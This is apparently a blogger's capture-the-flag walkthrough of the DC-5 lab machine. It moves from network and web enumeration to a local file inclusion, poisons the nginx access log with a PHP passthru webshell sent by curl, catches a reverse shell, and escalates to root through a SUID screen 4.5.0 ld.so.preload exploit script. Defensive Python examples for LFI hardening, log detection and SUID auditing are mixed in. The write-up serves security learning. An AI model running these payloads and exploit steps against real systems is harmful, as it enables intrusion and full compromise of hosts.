DC-5 Walk-Through

Another day, another box. Today I am working on DC-5, and it was great: I learned some awesome attacks and something as simple as “When All You Can Do Is Read” (pretty informative, give this one a Google search). To sum it up: what do we do when all we can do is read on a box? When we can’t list directories but we can call the famous /etc/passwd. You do this on a CTF because it is always called, but when you are working on an assessment and you can’t list, you start requesting files that you know are supposed to be there. This box was awesome and took a lot of enumeration. It started with a normal web page, but it is full of gibberish; the most subtle hint we get is that the year in the Copyright string changes every time we refresh the page, so from there we can tell something is going on with the thankyou.php page. After some tweaking we can tell that it’s vulnerable to LFI; from there we inject code to poison the access log file and get code execution. Then we continue with privilege escalation: another SUID binary, screen 4.5.0, that with a little coding and compilation we can use to escalate to root.

Arp-Scan

[dmcxblue@blackarch ~]$ sudo arp-scan -l
Interface: enp0s3, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	a4:08:f5:53:18:56	(Unknown)
192.168.1.9	84:4b:f5:63:d7:74	Hon Hai Precision Ind. Co.,Ltd.
192.168.1.175	00:c0:ca:96:e7:91	ALFA, INC.
192.168.1.119	30:d9:d9:54:6f:e2	(Unknown)
192.168.1.232	08:00:27:f2:aa:e5	Cadmus Computer Systems
192.168.1.169	88:de:a9:3c:5b:0d	Roku, Inc.
192.168.1.245	9c:ae:d3:ed:d2:7e	Seiko Epson Corporation

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 1.982 seconds (129.16 hosts/sec). 7 responded

From here we will continue with nmap Scan

[dmcxblue@blackarch ~]$ nmap -sT -p- --min-rate 5000 192.168.1.232
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:12 PDT
Nmap scan report for dc-5 (192.168.1.232)
Host is up (0.00027s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
34932/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.60 seconds

Nmap targeted port scan

[dmcxblue@blackarch DC-5]$ nmap -sC -sV -p80,111,34932 192.168.1.232 -oA nmap/DC5
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:14 PDT
Nmap scan report for dc-5 (192.168.1.232)
Host is up (0.00036s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34932/tcp   status
|   100024  1          35803/tcp6  status
|   100024  1          42276/udp   status
|_  100024  1          46377/udp6  status
34932/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.63 seconds

Gobuster

[dmcxblue@blackarch DC-5]$ gobuster -u http://192.168.1.232 -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o DC5-gobuster.log

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.232/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/09/04 10:19:36 Starting gobuster
=====================================================
/index.php (Status: 200)
/images (Status: 301)
/contact.php (Status: 200)
/faq.php (Status: 200)
/solutions.php (Status: 200)
/footer.php (Status: 200)
/css (Status: 301)
/about-us.php (Status: 200)
/thankyou.php (Status: 200)
=====================================================
2019/09/04 10:20:26 Finished
=====================================================

Burp Suite

I proceeded to launch Burp Suite for more detailed enumeration and testing, since the webpage had nothing of interest: just two interactive PHP pages, contact.php and thankyou.php.

I moved on to poking around by intercepting requests with Burp and adding special characters into the URL or any area that I thought might make the web server crash or respond differently, with no success.

Here I was using Repeater to see if anything would crash or give a different response, until I noticed that the Copyright footer changed years every time I refreshed it:

2019 / 2018 (Copyright year on two successive refreshes)

After tinkering with the URL a couple of times, I used ?file=../../etc/passwd to test for LFI, and with a positive result in Burp Suite we get the file back in the server’s response.
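The footer include behind the changing Copyright year is what makes ?file= an LFI. The following is an added illustration (not code from the write-up or from the DC-5 VM) of why the naive pattern fails and how a defender closes it. WEB_ROOT and ALLOWED_PAGES are assumed values chosen for the example; the real application's layout is not shown in this post. Note that with this hypothetical root the two-level payload from the post lands in /var/etc, which shows that the number of ../ segments an attacker needs depends on the include's base directory, while the containment and allowlist checks reject the request regardless of depth.

```python
import posixpath
from typing import Optional

# Hypothetical web root and page allowlist for this illustration; the real
# DC-5 application's layout is not shown in the write-up.
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"footer.php", "contact.php", "faq.php", "solutions.php", "about-us.php"}


def naive_resolve(requested: str) -> str:
    """The weak pattern behind an LFI: the value of ?file= is joined onto the
    web root with no containment check. ../ segments walk out of the root and
    an absolute path replaces it entirely (posixpath.join drops the base)."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested))


def contained_resolve(requested: str) -> Optional[str]:
    """Hardened variant: normalise, then require the result to stay under
    WEB_ROOT. commonpath is used instead of startswith so that a sibling such
    as /var/www/html-old cannot slip through as a prefix match."""
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, requested))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


def allowlisted_resolve(requested: str) -> Optional[str]:
    """Strictest variant: the parameter selects one of a fixed set of page
    names; anything else, traversal or not, is refused."""
    if requested not in ALLOWED_PAGES:
        return None
    return posixpath.join(WEB_ROOT, requested)


if __name__ == "__main__":
    for value in ("footer.php", "../../etc/passwd", "../../../etc/passwd",
                  "/var/log/nginx/access.log"):
        print(f"{value!r:30} naive={naive_resolve(value)!r:30} "
              f"contained={contained_resolve(value)!r} "
              f"allowlist={allowlisted_resolve(value)!r}")
```

The allowlist is the form to prefer when the set of includable pages is fixed, as it is for a footer; the containment check is the fallback when genuinely dynamic paths are unavoidable.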

After more research into this vulnerability, I found an article showing step by step how to move from LFI to a shell.

LFI to Shell

Following these steps, I will continue on to get a shell.

We see that we have access to the access.log file, so we will need to add PHP code into the logs and try to get code execution.

We can use curl to inject the code in this step:

[dmcxblue@blackarch ~]$ curl -i 'http://192.168.1.233/thankyou.php?file=<?php passthru($_GET["cmd"]); ?>'
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 04 Sep 2019 19:14:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

We can verify with our curl command that we have code execution:

curl -i 'http://192.168.1.233/thankyou.php?file=/var/log/nginx/access.log&cmd=id'
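The two requests above leave a very recognisable trail in the same access log they abuse. As an added example (not part of the original post), the following scans nginx combined-format log lines for the three signals involved: traversal or sensitive paths in a query parameter, a PHP open tag in the request line (the poisoning write), and a log-file path in file= combined with cmd= (the trigger). The log lines are constructed to mirror the write-up's requests and are sample data, not the real DC-5 log.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed nginx access-log lines (combined format) modelled on the requests
# in this write-up; sample data, not the real DC-5 log.
SAMPLE_LOG = """\
192.168.1.50 - - [04/Sep/2019:12:10:01 -0700] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.168.1.50 - - [04/Sep/2019:12:11:45 -0700] "GET /thankyou.php?file=../../etc/passwd HTTP/1.1" 200 1420 "-" "curl/7.65.3"
192.168.1.50 - - [04/Sep/2019:12:14:28 -0700] "GET /thankyou.php?file=<?php passthru($_GET['cmd']); ?> HTTP/1.1" 200 312 "-" "curl/7.65.3"
192.168.1.50 - - [04/Sep/2019:12:15:02 -0700] "GET /thankyou.php?file=/var/log/nginx/access.log&cmd=id HTTP/1.1" 200 98765 "-" "curl/7.65.3"
192.168.1.51 - - [04/Sep/2019:12:16:30 -0700] "GET /contact.php HTTP/1.1" 200 2040 "-" "Mozilla/5.0"
"""

# The first double-quoted field of a combined-format line is the request line.
# nginx escapes literal quotes inside it as \x22, so [^"]* is safe here.
REQUEST_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)"')
TRAVERSAL_RE = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/var/log/")
LOG_PATHS = ("/var/log/",)


def analyse_target(target: str) -> List[str]:
    """Return the reasons a single request target looks like LFI abuse."""
    findings: List[str] = []
    # Decode twice so %252e%252e-style double encoding is also caught.
    fully_decoded = unquote_plus(unquote_plus(target))
    if PHP_TAG_RE.search(fully_decoded):
        findings.append("php tag in request (log poisoning attempt)")
    # parse_qs already decodes once; decode each value a second time as well.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            value = unquote_plus(value)
            if TRAVERSAL_RE.search(value):
                findings.append(f"directory traversal in {name}=")
            if any(s in value for s in SENSITIVE_PATHS):
                findings.append(f"sensitive file path in {name}=")
    file_values = [unquote_plus(v) for v in query.get("file", [])]
    if "cmd" in query and any(v.startswith(LOG_PATHS) for v in file_values):
        findings.append("log file included together with cmd= (execution attempt)")
    return findings


def scan_log(text: str) -> Dict[int, List[str]]:
    """Map 1-based line numbers to findings for every suspicious request."""
    flagged: Dict[int, List[str]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        request = m.group("request")
        # "METHOD target HTTP/x.y": peel off the method and the version so a
        # target containing spaces (as in the poisoning request) stays intact.
        try:
            _method, rest = request.split(" ", 1)
            target, _version = rest.rsplit(" ", 1)
        except ValueError:
            continue
        findings = analyse_target(target)
        if findings:
            flagged[lineno] = findings
    return flagged


if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: " + "; ".join(reasons))
```

The poisoning request is the one that matters operationally: once a PHP tag is sitting in the log, any later include of that file executes it, so the alert on line 3 should fire before the trigger on line 4 ever arrives.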

Now to receive a shell

Upgrade shell

[dmcxblue@blackarch DC-5]$ ncat -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.233.
Ncat: Connection from 192.168.1.233:35736.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i

which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Here we will use the LinEnum.sh script, as it saves a huge amount of enumeration time. This does not mean we shouldn’t also check manually, but it at least verifies the common exploits and misconfigurations, mainly for CTFs.

Among the SUID files one stands out, as it is not common on a Linux machine to see a binary listed with its version in the name:

[-] SUID files:
-rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19 23:48 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19  2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25 23:07 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
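Spotting screen-4.5.0 in that list by eye is exactly what a SUID baseline check automates. The following is an added example (not part of the write-up or of LinEnum) that parses the listing above, compares every path against a baseline of setuid/setgid binaries expected on a stock Debian 8 host, and additionally flags version-suffixed names, since a hand-installed, versioned setuid-root binary is the pattern this box exploits. The baseline set is a constructed illustration; a real audit would derive it from package manifests or a known-good image.

```python
import re
from typing import Dict, List

# SUID/SGID listing as reported by LinEnum in this write-up (the coloured
# header line has been left out).
SUID_LISTING = """\
-rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19 23:48 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19  2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25 23:07 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
"""

# Constructed baseline of setuid/setgid paths expected on a stock Debian 8
# host. Illustrative only; derive a real one from package manifests.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount",
    "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/chsh", "/usr/bin/procmail", "/usr/bin/at",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# ls -l style line: mode, link count, owner, group, size, three date tokens, path.
LS_LINE_RE = re.compile(
    r"^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$"
)
# A trailing "-4.5.0" style suffix: a binary installed by hand rather than by
# the package manager, which names files without the version.
VERSIONED_NAME_RE = re.compile(r"-\d+(\.\d+)+$")


def audit_suid_listing(listing: str) -> List[Dict[str, object]]:
    """Return one record per setuid/setgid binary that deviates from the baseline."""
    findings: List[Dict[str, object]] = []
    for line in listing.splitlines():
        m = LS_LINE_RE.match(line.strip())
        if not m:
            continue
        mode, owner, group, path = m.group("mode", "owner", "group", "path")
        setuid = mode[3] in "sS"   # owner execute slot carries the setuid bit
        setgid = mode[6] in "sS"   # group execute slot carries the setgid bit
        reasons: List[str] = []
        if path not in EXPECTED_SUID:
            reasons.append("not in baseline")
        if VERSIONED_NAME_RE.search(path):
            reasons.append("version-suffixed binary name")
        if reasons:
            findings.append({
                "path": path,
                "owner": owner,
                "group": group,
                "setuid_root": setuid and owner == "root",
                "setgid": setgid,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_suid_listing(SUID_LISTING):
        impact = "setuid-root" if f["setuid_root"] else "setuid/setgid"
        print(f"{f['path']}: {impact}; " + ", ".join(f["reasons"]))
```

Running this on the listing reports a single deviation, /bin/screen-4.5.0, as setuid-root and both outside the baseline and version-suffixed; on a fleet the same check is cheap to run from a cron job or a configuration-management compliance rule.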

We verify on Exploit-DB that there is a local privilege escalation exploit for this SUID binary. There are plenty of resources on how to exploit this vulnerability; I used this blog post to compile and run the exploit, as sometimes it doesn’t run as-is and you need to manually compile it and make it work.

SUID

Once done we can confirm our root shell

These are the files we will need to compile on our attacking box.

Compile: 

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

gcc -o /tmp/rootshell /tmp/rootshell.c

Run by following these steps:

We will start a Python HTTP server and send these to the victim box; this has to be done after compiling on our own local machine.

We will move our script.sh over as-is so that, the moment it runs, it executes all the needed steps to receive a root shell.

[dmcxblue@blackarch tmp]$ cat script.sh
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

Then we execute

And we will get the flag

This box was awesome, a really interesting way to approach it and receive a shell. Also, BlackArch Linux is an incredible OS, all great, so many tools! More than 2000. I was just browsing and wanted to try a few other pen-testing boxes to see what’s going on out there. Remember people, there are so many ways to hack!

[Not being sponsored or any of that; the OS is all open source and the authors are doing this in their spare time, so do go check them out. The OS is also pretty heavy at 26GB, but still awesome. A few tools are outdated, such as gobuster as I noticed, and it’s a little buggy with SQLMap, but that’s something that can be fixed and not a major reason to stop using this incredible OS. Oh, and I still went with GNOME on it, lol.]

Categories: DC Series, General

dmcxblue

Infosec Hobbyist, Wanna be Red-Teamer, Pentester Dreamer
OSCP | OSWP
GED- In Progress
